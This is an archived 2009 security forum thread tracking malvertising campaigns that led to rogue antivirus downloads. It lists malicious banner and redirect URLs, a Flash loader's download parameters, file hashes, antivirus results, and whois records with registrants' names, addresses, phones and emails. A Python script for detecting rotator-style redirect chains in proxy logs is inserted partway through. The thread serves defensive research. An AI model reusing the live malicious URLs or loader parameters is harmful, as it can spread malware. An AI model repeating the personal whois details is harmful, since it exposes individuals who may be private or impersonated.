Full Version: Flash Mystery
B.I.S.S. Forums > Malware News , Research & Removal > Malware Playground
Kimberly

WARNING: LetsSingIt - Swatch


Another malvertizement featuring Swatch is being displayed at LetsSingIt. The malicious banner has been acquired by LetsSingIt and is redirecting people to total-virusprotection.com.

Screenshot in situ.
Banner.
includes.letssingit.com/ads/SWATCH300x250.swf
Campaign.
cosmotraf.net/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]
crustat.com/ts/in.cgi?[*]&se=[*]&ur=[*]&HTTP_REFERER=wel-cmpid[*]
truconv.com/?a=[*]&s=[*]
top-name.cn/in.cgi?default&a=[*]&s=[*]
total-virusprotection.com/xpprot/3/?a=[*]&s=[*]&z=[*]

Kimberly

Warning: blogads.com - Ebay


A new malvertizement featuring Ebay is currently being distributed via blogads.com.

Ebay 300x250
Ebay 728x90
Ebay 160x600
Campaign

All malicious banners are using the same redirects.
statcluster.com/crossdomain.xml
statcluster.com/c/index.php?id=[*]
enjoyspringtime.com/?cmpid=[*]&subaff=[*]
crustat.com/ts/in.cgi?[*]&se=[*]&ur=[*]&HTTP_REFERER=[*]
justwebsecurity.com/[*]

IP details


statcluster.com - 174.37.196.175

Updated Date: 16-apr-2009
Creation Date: 03-apr-2009
Registrar: YESNIC CO. LTD.
Name Server: NS1.STATCLUSTER.COM - NS2.STATCLUSTER.COM

enjoyspringtime.com - 38.99.168.101

Updated Date: 17-apr-2009
Creation Date: 20-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET

crustat.com - 94.76.213.234

Updated Date: 05-mar-2009
Creation Date: 05-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET

justwebsecurity.com - 91.212.65.55

Updated Date: 20-apr-2009
Creation Date: 20-apr-2009
Registrar: REGTIME LTD.
Name Server: NS1.JUSTWEBSECURITY.COM - NS2.JUSTWEBSECURITY.COM

Registrant:
Rene Clay
Email: RenePClay@text2re.com
Organization: Private person
Address: 1555 Lake Floyd Circle
City: Chevy Chase
State: MD
ZIP: 20815
Country: US
Phone: +1.3019415618
Kimberly

Warning: Malvertizement ft. Toshiba


A new malicious banner ft. Toshiba is being distributed by celebritiesfans.com.

Banner
celebritiesfans.com/banner728x90.swf

Campaign
statcluster.com/c/index.php?id=[*]
enjoyspringtime.com/?cmpid=[*]
Kimberly

HTML ActiveX Object Error


Today I ran into a strange message box being displayed while viewing Google images ... HTML ActiveX Object Error ... don't be fooled, it's yet another trick to push a rogue antivirus program on your computer.
A quick look at the network captures reveals a 302 redirect.
But why are we getting redirected to blackporn1.com or blackpornmix.com? The answer is simple, the htaccess files on those websites have been hacked.
From blackporn1.com or blackpornmix.com we bump to tubeontvgl.com and uploadmoviez.com. Interesting point ... win-pc-defender.com, uploadmoviez.com and tubeontvgl.com share the same IP. blackpornmix.com has already been caught in htaccess hacks back in March 2009 - Ref.

Needless to say that the redirect will happen from other search engines too as seen below.
codec.exe.

Additional information
File size: 106499 bytes
MD5...: 9a6d60840a24cc36af6436622275387b
SHA1..: 2e37689944f1dc26dbf058037e855568d422e158
SHA256: e26a8b03dcf2ae9a7fe27fe936d9a8c984d4fec0ff21eefc86ddba643079d7ec
PEiD..: -

ThreatExpert info.

File codec.exe received on 04.27.2009 17:08:02 (CET)
QUOTE
a-squared 4.0.0.101 2009.04.27 Trojan-Downloader.Win32.FakeRean!IK
AhnLab-V3 5.0.0.2 2009.04.27 Dropper/Agent.106499
AntiVir 7.9.0.156 2009.04.27 TR/Dldr.FakeRean.8
Antiy-AVL 2.0.3.1 2009.04.27 -
Authentium 5.1.2.4 2009.04.26 -
Avast 4.8.1335.0 2009.04.26 Win32:Trojan-gen {Other}
AVG 8.5.0.287 2009.04.27 SHeur2.ACOF
BitDefender 7.2 2009.04.27 -
CAT-QuickHeal 10.00 2009.04.27 (Suspicious) - DNAScan
ClamAV 0.94.1 2009.04.27 -
Comodo 1137 2009.04.27 -
DrWeb 4.44.0.09170 2009.04.27 -
eSafe 7.0.17.0 2009.04.27 Win32.TrojanDownload
eTrust-Vet 31.6.6478 2009.04.27 -
F-Prot 4.4.4.56 2009.04.27 -
F-Secure 8.0.14470.0 2009.04.27 Trojan-Dropper.Win32.Agent.ankj
Fortinet 3.117.0.0 2009.04.27 W32/Agent.SR!tr.dldr
GData 19 2009.04.27 Win32:Trojan-gen {Other}
Ikarus T3.1.1.49.0 2009.04.27 Trojan-Downloader.Win32.FakeRean
K7AntiVirus 7.10.717 2009.04.27 -
Kaspersky 7.0.0.125 2009.04.27 Trojan-Dropper.Win32.Agent.ankj
McAfee 5597 2009.04.26 -
McAfee+Artemis 5597 2009.04.26 Generic!Artemis
McAfee-GW-Edition 6.7.6 2009.04.27 Trojan.Dldr.FakeRean.8
Microsoft 1.4602 2009.04.27 TrojanDownloader:Win32/FakeRean
NOD32 4036 2009.04.27 Win32/Adware.WinPCDefender
Norman 6.00.06 2009.04.27 -
nProtect 2009.1.8.0 2009.04.27 -
Panda 10.0.0.14 2009.04.27 Trj/CI.A
PCTools 4.4.2.0 2009.04.27 -
Prevx1 3.0 2009.04.27 -
Rising 21.27.02.00 2009.04.27 -
Sophos 4.41.0 2009.04.27 Mal/EncPk-HH
Sunbelt 3.2.1858.2 2009.04.24 Packer.Lighty.Gen (v)
Symantec 1.4.4.12 2009.04.27 Downloader.MisleadApp
TheHacker 6.3.4.1.315 2009.04.27 -
TrendMicro 8.700.0.1004 2009.04.27 -
VBA32 3.12.10.3 2009.04.27 -
ViRobot 2009.4.27.1710 2009.04.27 -
VirusBuster 4.6.5.0 2009.04.27 Trojan.DR.Agent.JLJP

IP details


blackporn1.com - 195.190.13.234

Updated Date: 30-mar-2009
Creation Date: 19-sep-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.CRIMENEWS.ASIA - NS2.CRIMENEWS.ASIA
Registrant: PrivacyProtect.org

blackpornmix.com - 195.190.13.234

Updated Date: 28-feb-2009
Creation Date: 19-sep-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.CRIMENEWS.ASIA - NS2.CRIMENEWS.ASIA
Registrant: PrivacyProtect.org

uploadmoviez.com - 194.165.4.77

Updated Date: 24-apr-2009
Creation Date: 24-apr-2009
Registrar: BIZCN.COM, INC.
Name Server: NS2.NAMESERVERS01.COM - NS3.NAMESERVERS01.COM

Registrant Contact: Pish Upyachka
Constantine Teplyakov constnw@gmail.com
+66 (456) 355540 fax: +66 (456) 456456
My adress str
Pattaya Chon Buri 10152
th

tubeontvgl.com - 194.165.4.77

Updated Date: 24-apr-2009
Creation Date: 24-apr-2009
Registrar: BIZCN.COM, INC.
Name Server: NS2.NAMESERVERS01.COM - NS3.NAMESERVERS01.COM

Registrant Contact: Constantine Teplyakov constnw@gmail.com
+66 (456) 355540 fax: +66 (456) 456456
My adress str
Pattaya Chon Buri 10152
th

win-pc-defender.com - 194.165.4.77

Updated Date: 06-apr-2009
Creation Date: 15-mar-2009
Registrar: BIZCN.COM, INC.
Name Server: NS2.NAMESERVERS01.COM - NS3.NAMESERVERS01.COM

Registrant Contact: Nexton Limited
Sergey Ryabov director@climbing-games.com
+79219270961 fax:
Scherbakova st., 6-38
Saint-Petersburg Saint-Petersburg 197375
ru

My adress str in the whois details ... ya gotta be joking.
Kimberly

Warning: www.wwe.com - HP


A malvertizement ft. HP is displayed at www.wwe.com, the official site of World Wrestling Entertainment. The malicious banner is identical to those discovered at guardian.co.uk and electronicsnews.com.au but located on a different server.

Screenshot in situ.
Banner.
m1.2mdn.net/989589/hp_728x90.swf
Campaigns.
ydmstats.com/c/index.php?id=[*]
measurehits.com/?cmpid=[*]&subaff=[*]
Kimberly

Warning: www.bestvenues.com.au & www.motogp.com - HP


A malvertizement ft. HP is being displayed at www.bestvenues.com.au by DoubleClick. It's the same malicious banner as discovered earlier at the official site of World Wrestling Entertainment www.wwe.com. The malvertizement is again located on a "different server".

Screenshot in situ.
Banner.
m1.au.2mdn.net/989589/hp_728x90.swf
______________________________

Double trouble for www.motogp.com ...
Banners.
m1.emea.2mdn.net/989589/hp_728x90.swf
m1.emea.2mdn.net/989589/hp_300x250.swf
Kimberly

Warning: comcast.vehix.com - BestWestern


DoubleClick busted again ... 2 malvertizements ft. BestWestern are displayed at comcast.vehix.com.

Screenshot in situ.
Banners.
m1.2mdn.net/2198329/bestwestern728x90-new.swf


m1.2mdn.net/2198329/bestwestern300x250-new.swf

Campaigns.
cosmotraf.net/c/index.php?id=[*]
pleaselinkmeto.com/?cmpid=[*]&url=bestwestern&id=[*]
cosmotraf.net - 88.198.8.15

Updated Date: 05-mar-2009
Creation Date: 05-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET

pleaselinkmeto.com - 212.117.165.128

Updated Date: 05-mar-2009
Creation Date: 05-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET
Kimberly

Warning: www.ifood.tv - Classmates


A malvertizement ft. Classmates is displayed at www.ifood.tv.

Screenshot in situ.
Banner.
m1.2mdn.net/2282252/classmates300x250.swf

Campaign.
hitoptimist.com/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]&url=[*]
crustat.com/ts/in.cgi?[*]&se=[*]&ur=[*]&HTTP_REFERER=[*]
truconv.com/?a=[*]&s=[*]
total-virusprotection.com/xpprot/2/?a=[*]&s=[*]
I have the impression that DoubleClick's vigilance is going downhill lately. This is the fourth malicious banner being discovered since April 10 2009 on highly frequented websites.
  1. April 10: Rhapsody
  2. April 28: HP
  3. May 1: BestWestern
One can easily imagine how many people got infected in the past month by rogue antivirus products such as Antivirus 360 / 2009 / 2010, TotalVirusProtection etc ... especially if they use flash files to force downloads on people's computers as seen below and because advertising companies let their attention slip again in the checking process of creatives.

Load.swf takes 2 parameters transmitted in the URL, t and u, which represent the location of a download php script.
justwebsecurity.com/load.swf?&p=0&t=_self&u=download.php?affid=[*]

Oh .. btw, a 468x60 version of the malvertizement ft. Classmates is present on the DoubleClick servers ... it's actually listed as being the 728x90 banner size but its real size is 468x60. Surprised? I'm not ...
m1.2mdn.net/2282252/classmates728x90.swf

Kimberly

Warning: www.fitnessmagazine.com - Classmates


Remember I did highlight the existence of a horizontal malicious banner hosted at DoubleClick earlier today? The malvertizement is being served at www.fitnessmagazine.com and www.ifood.tv.

www.fitnessmagazine.com.

www.ifood.tv.
Banner.
m1.2mdn.net/2282252/classmates728x90.swf
Campaign.
hitoptimist.com/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]&url=[*]
Kimberly

Warning: www.bhg.com - Classmates


The 300x250 version of the malvertizement ft. Classmates is displayed at Better Homes & Gardens - www.bhg.com.

Screenshot in situ.
Banner.
m1.2mdn.net/2282252/classmates300x250.swf
Campaign.
hitoptimist.com/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]&url=[*]
Kimberly

Warning: Gilmours Media - gilmoursmedia.com


Gilmours Media has been caught distributing malvertizements. Full Story by Sandi.

Gilmours Media has also advertised themselves on AdRoll and this simple fact does reveal some other interesting points to meditate about.
As seen on the screenshot below, they associate themselves with BioTrainer Weight Loss System - biotrainerusa.com - and regular readers will remember that we discovered several malicious banners featuring BioTrainer in the past. References here, here and here.
Furthermore the link Public Relations/Media at the bottom of the webpage not only goes to another domain - www.biotrainer.info - but reveals some interesting "behavior" too.
Successive visits bring us a new page each time ...
Network capture shows us that we are visiting a search portal called searchportal.information.com

IP details


biotrainerusa.com - 68.178.206.224

Registrar: GODADDY.COM, INC.
Name Server: NS.BIOTRAINERWEB.COM - NS1.BIOTRAINERWEB.COM
Updated Date: 13-oct-2008
Creation Date: 02-dec-2004
Registrant: Domains by Proxy, Inc.
______________________________

www.biotrainer.info - 208.73.210.121

Created On:16-Jun-2005 03:40:15 UTC
Last Updated On:13-Apr-2009 22:41:47 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Name Server:NS1.DSREDIRECTION.COM - Name Server:NS2.DSREDIRECTION.COM
Registrant Organization:Deerwood Investments, LLC
Registrant Street1:7362 Remcon Circle
Registrant City:El Paso
Registrant State/Province:Texas
Registrant Postal Code:79912
Registrant Country:US
Registrant Phone:+1.3124924577
Registrant FAX Ext.:
Registrant Email:deerwooddomains@gmail.com
______________________________

searchportal.information.com - 208.73.210.121

Registrar: NAMEKING.COM, INC.
Name Server: NS1.OVERSEE.NET - NS2.OVERSEE.NET
______________________________

Note: 208.73.210.121 is associated with a ZeuS domain. See also: ntos.exe and oembios.exe
Kimberly

Warning: internetnetworkads.com - Nokia


Today 2 banners have been brought to my attention for suspicious behavior / whois registration. The advertisements feature Nokia and are distributed by internetnetworkads.com. Currently there is no malicious redirect but the link inside the creatives is very typical of a rotator (see below). internetnetworkads.com is registered by DIRECTI INTERNET SOLUTIONS PVT. LTD. and the creative contains obfuscated actionscript code ... 3 reasons to treat all content from internetnetworkads.com with extreme caution.

Banner.
Links.
internetnetworkads.com/url3/in.php?id=9

www.surveyclub.com/?aip=[*]&cid=[*]
Banner.
Links.
internetnetworkads.com/url3/in.php?id=9&refer=[*]=[*]=&lang=[*]=&opsys=[*]==&mac=[*]==&xD=[*] ....

internetnetworkads.com/cmp/click.php?id=9
Note: the second URLs are the click URLs.

internetnetworkads.com returns a 404 error while the cmp folder pops up a login box.
Rotator.

A rotator is a link to a "Traffic Management System" which points to different destinations when requested several times. The system remembers your IP address on the server-side for a certain time period. After that time, or when you just use another IP address, you will again see the redirections when visiting the URL. Usually the redirections are based on a typical HTTP “302 Found” response with a new location from the server where the traffic management system is installed. Rotators typically look like:
www.example.com/in.cgi?default
www.example.com/tds/in.cgi?1
www.example.com/sutra/in.cgi?6

IP Details


internetnetworkads.com - 94.76.213.227

Updated Date: 15-jun-2009
Creation Date: 16-apr-2009
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.REG.RU - NS2.REG.RU

Registrant:
Olivier Le Pord (shreeadarsha@gmail.com)
Unit No. 6B , 6th Floor of M-6
New Delhi
New Delhi,110001
IN
Tel. +91.2230611555
Fax. +91.2230611555

domains sharing nameservers

a-mart.ru | adao.ru | adcart.net | adman.com | afy.ru | anyavto.com | anyclassics.com | anycomedy.com | anycredits.com | anyfantastic.com | anyflirt.com | anyhorror.com | anyinform.com | anymebel.com | anymobil.com | anyoptics.com | anypersonal.com | anypolitician.com | anyseach.com | anysmi.com | baldinini.net | beautyprorus.ru | botservice.ru | coolmaskarad.com | cottage-millenium.ru | cybersquatting.ru | defense-chelny.ru | deffence.ru | dobrovoz.ru | ealbum.ru | em-service.ru | hotelhelsinki.ru | inter-line.ru | lin2world.net | loadclip.ru | mebel-ekt.ru | multimedia-catalog.ru | n-photo.ru | naraboty.com | olgafomina.ru | ooodias.ru | ostprod.ru | pomoyka.ru | reg.ru | rf-perm.ru | ribca.net | robainapalomino.com | rublewka.ru | runetovec.ru | serverx.ru | sezam-service.ru | shanson.ru | stepnpay.ru | tempru.com | tic-rus.ru | trustindesign.ru | untex-sib.ru | untouchable.name | vsecargo.ru | worldsex.ru | x4u.ru

ip numbers of nameservers

81.177.8.189 | 92.241.180.114

The email address shreeadarsha@gmail.com is also associated to ADVERTISEDCLICKS.BIZ

advertisedclicks.biz - 81.177.22.95

Domain Registration Date: Fri Feb 20 09:40:41 GMT 2009
Domain Last Updated Date: Wed Apr 22 02:49:44 GMT 2009
Sponsoring Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Registrant Name: Shree Adarsha
Registrant Organization: N/A
Registrant Address1: Singha Durbar of.3
Registrant City: Kathmandu
Registrant State/Province: Karnali
Registrant Postal Code: 3987
Registrant Country: Nepal
Registrant Country Code: NP
Registrant Phone Number: +977.14211892
Registrant Email: shreeadarsha@gmail.com
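The rotator behaviour described in this post (a chain of HTTP 302 hops through in.cgi / in.php / c/index.php?id= style entry points, ending at a download) is something a defender can pick out of proxy logs. The following is an added example, not code from this thread: it reconstructs per-client redirect chains from constructed log lines (the log format, hostnames and URLs are all made up for the demonstration) and flags chains that look like a traffic management system.

```python
"""Reconstruct HTTP redirect chains from proxy log lines and flag
rotator / traffic-management-system style chains.

Added example; not code from the forum thread. The log line format and
every hostname / URL below are constructed for this demonstration.
"""
import re
from urllib.parse import urlsplit

# Path shapes the thread shows as typical rotator / campaign entry points:
# .../in.cgi?..., .../in.php?id=..., /c/index.php?id=...  (simple watch-list)
ROTATOR_PATH_RE = re.compile(r"/(?:[\w-]+/)*in\.(?:cgi|php)\b|/c/index\.php$")

# Constructed log format: <timestamp> <client> <method> <url> <status> [location=<url>]
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>GET|POST) (?P<url>\S+) "
    r"(?P<status>\d{3})(?: location=(?P<location>\S+))?$"
)
REDIRECT_CODES = (301, 302, 303, 307)


def parse_line(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def build_chains(lines):
    """Group requests per client; a redirect whose Location equals the
    client's next requested URL links the two records into one chain."""
    by_client = {}
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_client.setdefault(rec["client"], []).append(rec)
    chains = []
    for client, recs in by_client.items():
        chain, pending = [], None
        for rec in recs:
            if pending is not None and rec["url"] == pending:
                chain.append(rec)          # this request is the redirect target
            else:
                if chain:
                    chains.append((client, chain))
                chain = [rec]              # start a fresh chain
            pending = rec["location"] if rec["status"] in REDIRECT_CODES else None
        if chain:
            chains.append((client, chain))
    return chains


def classify(chain):
    """Return the list of findings for one chain (empty list = nothing notable)."""
    hops = [r["url"] for r in chain]
    findings = []
    if any(ROTATOR_PATH_RE.search(urlsplit(u).path) for u in hops):
        findings.append("rotator-style entry point")
    if len({urlsplit(u).hostname for u in hops}) >= 3:
        findings.append("multi-domain redirect chain")
    if urlsplit(hops[-1]).path.lower().endswith(".exe"):
        findings.append("chain ends in executable download")
    return findings


def triage(lines):
    """Return one record per chain that raised at least one finding."""
    results = []
    for client, chain in build_chains(lines):
        findings = classify(chain)
        if findings:
            results.append({"client": client,
                            "hops": [r["url"] for r in chain],
                            "findings": findings})
    return results


# Constructed sample log: one benign request, one four-hop campaign chain
# ending in an executable, and an unrelated client.
SAMPLE_LOG = """\
2009-04-27T17:01:02 10.0.0.5 GET http://images.example-search.test/search?q=flash 200
2009-04-27T17:01:03 10.0.0.5 GET http://adsrv.example-ad.test/c/index.php?id=77 302 location=http://lander.example-lp.test/?cmpid=77
2009-04-27T17:01:03 10.0.0.5 GET http://lander.example-lp.test/?cmpid=77 302 location=http://tds.example-tds.test/ts/in.cgi?5&se=g
2009-04-27T17:01:04 10.0.0.5 GET http://tds.example-tds.test/ts/in.cgi?5&se=g 302 location=http://rogue.example-av.test/xpprot/3/?a=1&s=2
2009-04-27T17:01:04 10.0.0.5 GET http://rogue.example-av.test/xpprot/3/?a=1&s=2 302 location=http://rogue.example-av.test/codec.exe
2009-04-27T17:01:05 10.0.0.5 GET http://rogue.example-av.test/codec.exe 200
2009-04-27T17:02:00 10.0.0.9 GET http://www.example-news.test/ 200
"""

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG.splitlines()):
        print(hit["client"], "->", " => ".join(hit["hops"]))
        print("   ", ", ".join(hit["findings"]))
```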
Kimberly

Warning: www.jbmadvertising.com - JBM Advertising


JBM Advertising has been caught distributing the Nokia malvertizement we saw a couple of days ago.
When we look up the contact details in Google Maps we stumble on another advertising agency at the same address called bfw Advertising - www.gobfw.com. bfw Advertising seems to have been created in 1999. Both websites are identical and wear the same page title: South Florida Advertising Agency.
www.jbmadvertising.com - 88.214.200.145

Updated Date: 22-may-2009
Creation Date: 22-may-2009
Name Server: NS0.HQHOST.NET - NS1.HQHOST.NET
Registration Service Provided By: REGNAME.BIZ
Registrant: Mr Shigetoshi Kudoh (kudohshigetoshi@googlemail.com)
1-7-8 Higashi-Kanda
Chiyoda-ku
Tokyo,6523
JP
Tel. +812.38618231
Kimberly

Warning: Malware distributed via Yahoo advertising network


Again Yahoo advertising didn't pay much attention when acquiring new advertising banners. All content from content.bannersulike.com - r.banner0709.com and worwink.com should be discarded immediately.
Banner.
served.antventure.com is called from an iframe on the Yahoo advertising server. From there we turn around in circles between ad.antventure.com and ad.yieldmanager.com, both Yahoo advertising servers. Finally content.bannersulike.com is called from an iframe at ad.yieldmanager.com
At content.bannersulike.com we discover a script leading us to a tracker, to the banner and to a malware download triggered from r.banner0709.com.
r.banner0709.com does forward us to worwink.com which contains an obfuscated script.
p1.php does trigger an Adobe PDF exploit while ve.png poses as an image file and loads a malicious Flash file. upm.php refers to an executable hosted at worwink.com.
Another example from content.bannersulike.com triggering the same redirects is the advertisement below for clearycontacts.com.au

IP details


content.bannersulike.com - 161.58.213.81 / 168.143.35.181

Updated Date: 13-jul-2009
Creation Date: 13-jul-2009
Registrar: GODADDY.COM, INC
Name Server: NS45.DOMAINCONTROL.COM - NS46.DOMAINCONTROL.COM

r.banner0709.com - 161.58.213.81 / 168.143.35.181

Updated Date: 29-jun-2009
Creation Date: 29-jun-2009
Registrar: GODADDY.COM, INC.
Name Server: NS37.DOMAINCONTROL.COM - NS38.DOMAINCONTROL.COM

Registrant:
Bryan Hunter
921 SW Washington St
Suite 228
Portland, Oregon 97205
United States

hostnames sharing ip with a-records

banner.yellowlinebanner.com | banners.greenlightbanner.com | modena2.securesites.net | more-banners.com | t.banner0709.com | www.more-banners.com

worwink.com - 212.95.37.186

Updated Date: 15-jul-2009
Creation Date: 15-jul-2009
Registrar: KEY-SYSTEMS GMBH
Name Server: NS1.WORWINK.COM - NS2.WORWINK.COM
Kimberly

content.bannersulike.com - r.banner0709.com - worwink.com


Another incident involving content.bannersulike.com, r.banner0709.com and worwink.com occurred 2 days ago. This time the Expedia malvertizement was displayed through the Yahoo advertising network. In the meantime the malicious content has been pulled from the advertising server within hours.
Kimberly

Outpost Webcontrol bypassed by Flash advertisements


Due to real life issues I haven't been much around lately and this morning while catching up with the latest malware news I was surprised when I noticed that some advertisements showed up in my IE session despite Outpost Webcontrol being active.
Flash content is blocked by default in my OP settings since I only allow Flash for trusted websites.
The network capture shows that we are dealing with Yahoo advertising. The link to the Flash file appears in clear at the adserver, next the Flash file is delivered to us and we clearly see that the type was correctly identified by the browser / Fiddler ... e.g. Content-Type: application/x-shockwave-flash.
I can't find a valid reason why these ads haven't been picked up by the Webcontrol Module. Furthermore you would think that the string /ads.* from the ImproveNet List would do the job but it didn't. Further examination shows that the banner size 728*90 is not even present in the default Outpost settings. Just FYI, adding the banner size to the list does not stop the advert from being displayed.

Details will be transmitted to Agnitum and hopefully this problem can be solved quickly because I'm really worried about this issue. Blocking Flash with the firewall was one of the possible solutions to protect yourself from malvertizements but where are we heading if our firewall doesn't recognize a Flash file anymore ?
Kimberly

bintus-bahi.cn/in2/oneComesEthics.swf


Reference: oneComesEthics.swf
QUOTE
The SWF (oneComesEthics.swf) is suspected to be malicious.
While Sandi seems unsure whether oneComesEthics.swf is malicious, a very quick analysis shows that the Flash file will request an executable from bintus-bahi.cn using the code below:
Note: I left out the majority of the myarray declarations as there are over 10300 lines of them.

Link
bintus-bahi.cn/in2/update.php?id=[*]&[*]
File wjqs.exe
Virustotal Results
CAT-QuickHeal 10.00 2009.09.14 (Suspicious) - DNAScan
oneComesEthics.swf

Two days ago the detection rate was 0/41 at Virustotal, today the detection is barely better with the score of 3/41. Only 3 AV vendors pick up the malicious Flash file ... IMHO way to go in improving and speeding up the inclusion of these malicious Flash files in the definitions. View Report
BitDefender 7.2 2009.09.14 Trojan.SWF.Dropper.Gen
GData 19 2009.09.14 Trojan.SWF.Dropper.Gen
Symantec 1.4.4.12 2009.09.14 Downloader.Swif
Kimberly

The New York Times victim of malvertizements


Times Site Was Victim of a Malicious Ad Swap
By David F. Gallagher
The New York Times Company said on Monday that NYTimes.com was the victim of an attacker who first posed as a legitimate advertiser, then started hitting site visitors with aggressive advertisements that appeared to be warnings about viruses.
......
The incident has been covered by several websites but one site in particular did draw my attention: Anatomy of a Malware Ad on NYTimes.com

The injection script posted by the author is very similar to the attacks at MySpace, allrecipes.com and Expedia involving prolinar.com and coincidence ... also uses includes02.js. Notice the Vonage ID ... Sandi posted earlier this month about incidents involving Vonage-Inc. One domain goes, another one shows up. Unfortunately the same advertising agencies keep on making the same errors over and over again while acquiring new advertisements. I'll repeat myself again .... It is time that advertising agencies start to investigate more seriously new offers before infecting innocent users like you and me.
Kimberly

HeavensPunishers - hp.teamclouds.com


HeavensPunishers phpbb board has been severely compromised. A whole series of exploits starts off from there. Luckily several domains didn't resolve.
Usually the compromised websites are based on the PDF / Flash flaws but this time a new element appeared: for the first time I did encounter code taking advantage of the 0-day in Microsoft DirectShow (msvidctl.dll) exploit through a malformed PNG file. Today we will thus have a closer look at the files coming from ccikudor.cn. Upon arrival we are first hit by the PDF exploit, followed by the Flash and the PNG. The script is really a pain to decode as they "scrambled" the whole javascript by using vars instead of the real object names and did hide little bits left and right.
File theirYearsBook.pdf received on 2009.09.15 07:40:07 (UTC)

File size: 75834 bytes
MD5: a742017e862805a94f80884856d5d962
SHA1: d9c93941999e0a1547f23d65b66492b166d6d84c
SHA256: 106b05d58e21d5fe38933aed9703c64087ba0b33e9660e2c00d6dc0a2899271e
PEiD: -
Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.09.15 -
AhnLab-V3 5.0.0.2 2009.09.15 -
AntiVir 7.9.1.14 2009.09.14 EXP/Pidief.fyc
Antiy-AVL 2.0.3.7 2009.09.15 Exploit/Win32.Pidief
Authentium 5.1.2.4 2009.09.15 -
Avast 4.8.1351.0 2009.09.14 -
AVG 8.5.0.412 2009.09.14 -
BitDefender 7.2 2009.09.15 Exploit.PDF-JS.Gen
CAT-QuickHeal 10.00 2009.09.14 -
ClamAV 0.94.1 2009.09.14 -
Comodo 2323 2009.09.15 -
DrWeb 5.0.0.12182 2009.09.15 -
eSafe 7.0.17.0 2009.09.14 -
eTrust-Vet 31.6.6737 2009.09.14 -
F-Prot 4.5.1.85 2009.09.14 -
F-Secure 8.0.14470.0 2009.09.15 -
Fortinet 3.120.0.0 2009.09.15 -
GData 19 2009.09.15 Exploit.PDF-JS.Gen
Ikarus T3.1.1.72.0 2009.09.15 -
Jiangmin 11.0.800 2009.09.15 -
K7AntiVirus 7.10.844 2009.09.14 -
Kaspersky 7.0.0.125 2009.09.15 -
McAfee 5741 2009.09.14 -
McAfee+Artemis 5741 2009.09.14 -
McAfee-GW-Edition 6.8.5 2009.09.15 Exploit.Pidief.fyc
Microsoft 1.5005 2009.09.15 -
NOD32 4425 2009.09.14 -
Norman 6.01.09 2009.09.14 -
nProtect 2009.1.8.0 2009.09.14 -
Panda 10.0.2.2 2009.09.14 -
PCTools 4.4.2.0 2009.09.14 -
Prevx 3.0 2009.09.15 -
Rising 21.47.11.00 2009.09.15 -
Sophos 4.45.0 2009.09.15 Mal/PDFJs-L
Sunbelt 3.2.1858.2 2009.09.15 -
Symantec 1.4.4.12 2009.09.15 -
TheHacker 6.3.4.4.404 2009.09.15 -
TrendMicro 8.950.0.1094 2009.09.15 -
VBA32 3.12.10.10 2009.09.14 -
ViRobot 2009.9.15.1936 2009.09.15 -
VirusBuster 4.6.5.0 2009.09.14 -
File byEtExact.swf received on 2009.09.15 07:38:22 (UTC)

File size: 43142 bytes
MD5: 0cb2e04706992d551c558013684cea3e
SHA1: 97587512082d6e2e390dfa5959364dfc886f0e77
SHA256: 0f0ff8bd7b223fd883636d577871487d5eabb0fbc91c83408e0d9720a822057f
PEiD: -
packers (Kaspersky): Swf2Swc

Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.09.15 -
AhnLab-V3 5.0.0.2 2009.09.15 -
AntiVir 7.9.1.14 2009.09.14 -
Antiy-AVL 2.0.3.7 2009.09.15 -
Authentium 5.1.2.4 2009.09.15 -
Avast 4.8.1351.0 2009.09.14 -
AVG 8.5.0.412 2009.09.14 -
BitDefender 7.2 2009.09.15 Trojan.SWF.Dropper.Gen
CAT-QuickHeal 10.00 2009.09.14 -
ClamAV 0.94.1 2009.09.14 -
Comodo 2323 2009.09.15 -
DrWeb 5.0.0.12182 2009.09.15 -
eSafe 7.0.17.0 2009.09.14 -
eTrust-Vet 31.6.6737 2009.09.14 -
F-Prot 4.5.1.85 2009.09.14 -
F-Secure 8.0.14470.0 2009.09.15 -
Fortinet 3.120.0.0 2009.09.15 -
GData 19 2009.09.15 Trojan.SWF.Dropper.Gen
Ikarus T3.1.1.72.0 2009.09.15 -
Jiangmin 11.0.800 2009.09.15 -
K7AntiVirus 7.10.844 2009.09.14 -
Kaspersky 7.0.0.125 2009.09.15 -
McAfee 5741 2009.09.14 -
McAfee+Artemis 5741 2009.09.14 -
McAfee-GW-Edition 6.8.5 2009.09.15 -
Microsoft 1.5005 2009.09.15 -
NOD32 4425 2009.09.14 -
Norman 6.01.09 2009.09.14 -
nProtect 2009.1.8.0 2009.09.14 -
Panda 10.0.2.2 2009.09.14 -
PCTools 4.4.2.0 2009.09.14 -
Prevx 3.0 2009.09.15 -
Rising 21.47.11.00 2009.09.15 -
Sophos 4.45.0 2009.09.15 Troj/SWFLdr-D
Sunbelt 3.2.1858.2 2009.09.15 -
